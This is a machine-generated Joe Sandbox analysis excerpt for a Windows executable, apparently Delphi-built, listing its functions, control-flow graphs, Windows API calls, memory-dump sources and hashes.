                                                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                  • String ID:
                                                                  • API String ID: 2227675388-0
                                                                  • Opcode ID: 181fc5323324d463e0b204c274c5e8fb49fba454a3ba2a41092107ee5311f17d
                                                                  • Instruction ID: 5009b1ea9114b0094a56e97b8433b4d1c1f2aca413a5a65d1e4d938f1911b195
                                                                  • Opcode Fuzzy Hash: 181fc5323324d463e0b204c274c5e8fb49fba454a3ba2a41092107ee5311f17d
                                                                  • Instruction Fuzzy Hash: 03516CB0A80206DFCB09CFA8D995A6FB7F2FF58310F28A5A9D404A7391D3349A41CF55
                                                                  Function 006038F4 Relevance: 3.1, APIs: 2, Instructions: 69COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 376 6038f4-603907 377 603909-60390c 376->377 378 60391f-603926 376->378 377->378 379 60390e-60391d 377->379 380 603928-603934 call 6037dc call 603868 378->380 381 603939-60393d 378->381 379->378 380->381 382 60394d-603956 call 603670 381->382 383 60393f-603946 381->383 392 603961-603966 382->392 393 603958-60395f 382->393 383->382 386 603948-60394a 383->386 386->382 394 603984-60398d call 603648 392->394 395 603968-603978 call 604aa8 392->395 393->392 393->394 400 603992-603996 394->400 401 60398f 394->401 395->394 402 60397a-60397c 395->402 403 603998 call 603838 400->403 404 60399d-6039a0 400->404 401->400 402->394 405 60397e-60397f FreeLibrary 402->405 403->404 407 6039a2-6039a9 404->407 408 6039bc 404->408 405->394 409 6039b1-6039b7 ExitProcess 407->409 410 6039ab 407->410 410->409
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000,00000000,006028C8,?,00603A82,00608D1B,00000000), ref: 0060397F
                                                                  • ExitProcess.KERNEL32(00000000,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000,00000000,006028C8,?,00603A82,00608D1B,00000000), ref: 006039B7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ExitFreeLibraryProcess
                                                                  • String ID:
                                                                  • API String ID: 1404682716-0
                                                                  • Opcode ID: b19a67943c7b2b1daf05f16b5513985e7e93d5d216d3c41cae7a9180b9467bc7
                                                                  • Instruction ID: 55b83ea6f2e826010a0c4ece7eb1e404212ef759f0753011510d9abf1eba2f5f
                                                                  • Opcode Fuzzy Hash: b19a67943c7b2b1daf05f16b5513985e7e93d5d216d3c41cae7a9180b9467bc7
                                                                  • Instruction Fuzzy Hash: 2C21A1708802649FDB29AF24C4887AB7BDBAF04316F15555CE985873C2E7B48E80CB56
                                                                  Function 006038EC Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 411 6038ec-603907 413 603909-60390c 411->413 414 60391f-603926 411->414 413->414 415 60390e-60391d 413->415 416 603928-603934 call 6037dc call 603868 414->416 417 603939-60393d 414->417 415->414 416->417 418 60394d-603956 call 603670 417->418 419 60393f-603946 417->419 428 603961-603966 418->428 429 603958-60395f 418->429 419->418 422 603948-60394a 419->422 422->418 430 603984-60398d call 603648 428->430 431 603968-603978 call 604aa8 428->431 429->428 429->430 436 603992-603996 430->436 437 60398f 430->437 431->430 438 60397a-60397c 431->438 439 603998 call 603838 436->439 440 60399d-6039a0 436->440 437->436 438->430 441 60397e-60397f FreeLibrary 438->441 439->440 443 6039a2-6039a9 440->443 444 6039bc 440->444 441->430 445 6039b1-6039b7 ExitProcess 443->445 446 6039ab 443->446 446->445
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000,00000000,006028C8,?,00603A82,00608D1B,00000000), ref: 0060397F
                                                                  • ExitProcess.KERNEL32(00000000,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000,00000000,006028C8,?,00603A82,00608D1B,00000000), ref: 006039B7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ExitFreeLibraryProcess
                                                                  • String ID:
                                                                  • API String ID: 1404682716-0
                                                                  • Opcode ID: f325069adf687070a334fa40697b9fcd49a212d5335c7f3a9d341d9d974e8e5f
                                                                  • Instruction ID: 2f9eaafb93ec8653e51b4cd82b3db4cc76f12950b731b8b38f5c632ff51ff3d3
                                                                  • Opcode Fuzzy Hash: f325069adf687070a334fa40697b9fcd49a212d5335c7f3a9d341d9d974e8e5f
                                                                  • Instruction Fuzzy Hash: 2221D6708803A49FDB39AF2484887977BEBAF05316F15555CE585473C2E3B48DC0CB56
                                                                  Function 006038F0 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 447 6038f0-603907 448 603909-60390c 447->448 449 60391f-603926 447->449 448->449 450 60390e-60391d 448->450 451 603928-603934 call 6037dc call 603868 449->451 452 603939-60393d 449->452 450->449 451->452 453 60394d-603956 call 603670 452->453 454 60393f-603946 452->454 463 603961-603966 453->463 464 603958-60395f 453->464 454->453 457 603948-60394a 454->457 457->453 465 603984-60398d call 603648 463->465 466 603968-603978 call 604aa8 463->466 464->463 464->465 471 603992-603996 465->471 472 60398f 465->472 466->465 473 60397a-60397c 466->473 474 603998 call 603838 471->474 475 60399d-6039a0 471->475 472->471 473->465 476 60397e-60397f FreeLibrary 473->476 474->475 478 6039a2-6039a9 475->478 479 6039bc 475->479 476->465 480 6039b1-6039b7 ExitProcess 478->480 481 6039ab 478->481 481->480
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000,00000000,006028C8,?,00603A82,00608D1B,00000000), ref: 0060397F
                                                                  • ExitProcess.KERNEL32(00000000,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000,00000000,006028C8,?,00603A82,00608D1B,00000000), ref: 006039B7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ExitFreeLibraryProcess
                                                                  • String ID:
                                                                  • API String ID: 1404682716-0
                                                                  • Opcode ID: 341c4753de2e16dcf88b5fb5b33cd53f2a95c020f09f9771af9a8d17ec18d375
                                                                  • Instruction ID: 64ed28c09305657a82541d19f37544494afd81c1243ae3d87e68d10d64a254a8
                                                                  • Opcode Fuzzy Hash: 341c4753de2e16dcf88b5fb5b33cd53f2a95c020f09f9771af9a8d17ec18d375
                                                                  • Instruction Fuzzy Hash: 702180708803649FDB39AF6484887AB7BEBAF04316F15555CE985873C2E7B48EC0CB56
                                                                  Function 00601430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 482 601430-60143d 483 601446-60144c 482->483 484 60143f-601444 482->484 485 601452-60146a VirtualAlloc 483->485 484->485 486 60146c-60147a call 601254 485->486 487 60148f-601492 485->487 486->487 490 60147c-60148d VirtualFree 486->490 490->487
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,006017C3), ref: 0060145F
                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,006017C3), ref: 00601486
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 2087232378-0
                                                                  • Opcode ID: 62c46e49b18d3defb6c247ac89b686f8f7fdff1e2458d18e37cbeebf33e7946b
                                                                  • Instruction ID: 57ffc85c0a8273567a7168f065d21b94aa5c1f4b0fa45c5bbeece7ce0f1900f1
                                                                  • Opcode Fuzzy Hash: 62c46e49b18d3defb6c247ac89b686f8f7fdff1e2458d18e37cbeebf33e7946b
                                                                  • Instruction Fuzzy Hash: 01F02772B802201BEB6869694C81BA75AC78F87790F1540B5FA08EF3C9D2A18C0443A4
                                                                  Function 00604B70 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 491 604b70-604b7f 492 604b81-604b88 491->492 493 604bbe-604bc6 491->493 494 604bb4-604bb9 call 603bc8 492->494 495 604b8a-604bad call 60456c LoadStringA call 603adc 492->495 494->493 500 604bb2 495->500 500->493
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString
                                                                  • String ID:
                                                                  • API String ID: 2948472770-0
                                                                  • Opcode ID: 711959ec69ddf0aef349c976c532a5887a28d6375e42e04a3a5292524e5b3d5f
                                                                  • Instruction ID: 575e67a8becf17fef0a47515d8a560dacb20805ddcb8754f24ae3875a67bce89
                                                                  • Opcode Fuzzy Hash: 711959ec69ddf0aef349c976c532a5887a28d6375e42e04a3a5292524e5b3d5f
                                                                  • Instruction Fuzzy Hash: E9F0A0B57401209FCB69EA5CCCC1B8733CE9B48351B0480A4BA48CB39ADFA0CD4487E6
                                                                  Function 00604524 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 501 604524-604532 502 604534-60454b GetModuleFileNameA call 6047b8 501->502 503 60455f-60456a 501->503 505 604550-604557 502->505 505->503 506 604559-60455c 505->506 506->503
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00604542
                                                                    • Part of subcall function 006047B8: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000), ref: 006047D3
                                                                    • Part of subcall function 006047B8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 006047F1
                                                                    • Part of subcall function 006047B8: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0060480F
                                                                    • Part of subcall function 006047B8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0060482D
                                                                    • Part of subcall function 006047B8: RegQueryValueExA.ADVAPI32 ref: 00604876
                                                                    • Part of subcall function 006047B8: RegQueryValueExA.ADVAPI32 ref: 00604894
                                                                    • Part of subcall function 006047B8: RegCloseKey.ADVAPI32(?), ref: 006048B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                  • String ID:
                                                                  • API String ID: 2796650324-0
                                                                  • Opcode ID: 7431fb8d9b58ce30a09f7010ff69392a576d677b875bf995706f5953506670f3
                                                                  • Instruction ID: 3694939effd4bc20e2227c6228316c499c5c40963d8b001cc774436d54ef47f8
                                                                  • Opcode Fuzzy Hash: 7431fb8d9b58ce30a09f7010ff69392a576d677b875bf995706f5953506670f3
                                                                  • Instruction Fuzzy Hash: 22E06DB2A402148FCB64DE5C88C1A9733D9AB08750F000555EE68CF38BD7B1DD5087D5
                                                                  Function 0060150C Relevance: 1.3, APIs: 1, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(0000000C,00000000,00008000), ref: 00601585
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: 2cc36d4e18f8689b60fce1552236b6984c8fff9fcceb3222b8138fffddcafd23
                                                                  • Instruction ID: 8075652f9aa784974d24d701d5858d32910630675db23c5cae8cd0a8faf102c4
                                                                  • Opcode Fuzzy Hash: 2cc36d4e18f8689b60fce1552236b6984c8fff9fcceb3222b8138fffddcafd23
                                                                  • Instruction Fuzzy Hash: 2521CFB46443069FC315DF18D884A5ABBE2FB89360F64896DF5D9CB390E331E880CB56
                                                                  Function 00601694 Relevance: 1.3, APIs: 1, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,?,00004000), ref: 00601724
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: 380f0e667cdcda35798dd9e0ee4925b4df56ff15883d885e4c50dcfe8142ae0c
                                                                  • Instruction ID: 4a16f731b22991ac2a76659ab9516555874ef3e08bfb9b4dc2af4afb2578c23d
                                                                  • Opcode Fuzzy Hash: 380f0e667cdcda35798dd9e0ee4925b4df56ff15883d885e4c50dcfe8142ae0c
                                                                  • Instruction Fuzzy Hash: AE21F0B4244302CFC754CF2CD880A5ABBE1FF9A354F2449A9E594CB394E331E909CB52
                                                                  Function 00608D40 Relevance: 1.3, APIs: 1, Instructions: 64stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmp
                                                                  • String ID:
                                                                  • API String ID: 1534048567-0
                                                                  • Opcode ID: 6935ef7d523316265f7f0a10a8c9e10d1c8778d49998078bf7c2a287e26e37eb
                                                                  • Instruction ID: 3c3163c8fd1f24db34742e99c5fb436953fbcfcfa9b1c5a11e8948193b302a98
                                                                  • Opcode Fuzzy Hash: 6935ef7d523316265f7f0a10a8c9e10d1c8778d49998078bf7c2a287e26e37eb
                                                                  • Instruction Fuzzy Hash: 3F1146B17047019FC364DF1EC881A17B7E6EFD8224B09CA79E498C3762E630E8158B44

                                                                  Non-executed Functions

                                                                  Function 006045E0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144stringlibraryfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,0060593C,?,00000000), ref: 006045FD
                                                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,0060593C,?,00000000), ref: 0060460E
                                                                  • lstrcpyn.KERNEL32(?,?,?,?,00000000), ref: 00604642
                                                                  • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,0060593C,?,00000000), ref: 006046B3
                                                                  • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 006046EE
                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 00604701
                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 0060470E
                                                                  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 0060471A
                                                                  • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C), ref: 0060474E
                                                                  • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C), ref: 0060475A
                                                                  • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 00604783
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                  • API String ID: 3245196872-1565342463
                                                                  • Opcode ID: 2e4b354c8dbaeedcc6917afc53ded3b95313a27eaa8e3af3d783511b16afa5e1
                                                                  • Instruction ID: f25b1826d3d404d435323bdc63ce11a4a697c9fd044df481343fbc9de6b959a4
                                                                  • Opcode Fuzzy Hash: 2e4b354c8dbaeedcc6917afc53ded3b95313a27eaa8e3af3d783511b16afa5e1
                                                                  • Instruction Fuzzy Hash: 77513CB1D80158AFCB25DBE8CC85AEFB7FEAF46300F050595E255E7281DB709E408BA4
                                                                  Function 00604C91 Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00602ED4: GetKeyboardType.USER32 ref: 00602ED9
                                                                    • Part of subcall function 00602ED4: GetKeyboardType.USER32 ref: 00602EE5
                                                                  • GetCommandLineA.KERNEL32 ref: 00604CF7
                                                                  • GetVersion.KERNEL32 ref: 00604D0B
                                                                  • GetVersion.KERNEL32 ref: 00604D1C
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00604D58
                                                                    • Part of subcall function 00602F04: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00602F26
                                                                    • Part of subcall function 00602F04: RegQueryValueExA.ADVAPI32 ref: 00602F59
                                                                    • Part of subcall function 00602F04: RegCloseKey.ADVAPI32(?), ref: 00602F6F
                                                                  • GetThreadLocale.KERNEL32 ref: 00604D38
                                                                    • Part of subcall function 00604BC8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00604C2E), ref: 00604BEE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3734044017-0
                                                                  • Opcode ID: 5427cc31308d50f8f58cb81c4086aa616b8e4a906fae4bce7af71f1dfe7d5ce2
                                                                  • Instruction ID: feb53608f4c1b4819b7fdf81e77006572a780a3a92dd732f2b90cdc25788172e
                                                                  • Opcode Fuzzy Hash: 5427cc31308d50f8f58cb81c4086aa616b8e4a906fae4bce7af71f1dfe7d5ce2
                                                                  • Instruction Fuzzy Hash: 600125F44C4341C5E76DBF60AC8674B3A639F13344F14B85DE2514A3E2EF754184976A
                                                                  Function 00607C80 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00607CE4), ref: 00607CA6
                                                                  • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,00607CE4), ref: 00607CBF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: e880894ba020ddc62ee596d8cd5c09b1b6c01c9434385aacb196ec82a547e250
                                                                  • Instruction ID: e89210931a58a638a6c846f21b12b636f4f6c60df288084de7a95f4b792750e4
                                                                  • Opcode Fuzzy Hash: e880894ba020ddc62ee596d8cd5c09b1b6c01c9434385aacb196ec82a547e250
                                                                  • Instruction Fuzzy Hash: 37F09671E483086FEB19EFA1C85299FB3AFE7C8714F50C469F210D66C1EA7466008A54
                                                                  Function 00605F28 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDiskFreeSpaceA.KERNEL32 ref: 00605F5C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: DiskFreeSpace
                                                                  • String ID:
                                                                  • API String ID: 1705453755-0
                                                                  • Opcode ID: 304410d0ac547e5d1d925de7d2a7376f39ccb66023ae0efdc727b0736b15850a
                                                                  • Instruction ID: 56b83d0a114dc4be76b8d184bf3d54b45b608cab0625a8ac54ddf8ee86293d10
                                                                  • Opcode Fuzzy Hash: 304410d0ac547e5d1d925de7d2a7376f39ccb66023ae0efdc727b0736b15850a
                                                                  • Instruction Fuzzy Hash: A31103B1E45549AFCB04CF99C9819EFBBF9EF4D300B54816AE509E7251D6319A018F90
                                                                  Function 00604BC8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00604C2E), ref: 00604BEE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 70c7e4fc98cf2963b94dc73ecb73314ef86e2f22dd4bc1e3663de0f25d4ac65e
                                                                  • Instruction ID: de02df595dd3802e8db4d01f9782a19aad22c1cb7f6af6c436d93557c2efe90b
                                                                  • Opcode Fuzzy Hash: 70c7e4fc98cf2963b94dc73ecb73314ef86e2f22dd4bc1e3663de0f25d4ac65e
                                                                  • Instruction Fuzzy Hash: 5FF0A470A44359AFEB18DF91CC42AEFB37BFB85710F408838A210A76C0EAB42A448754
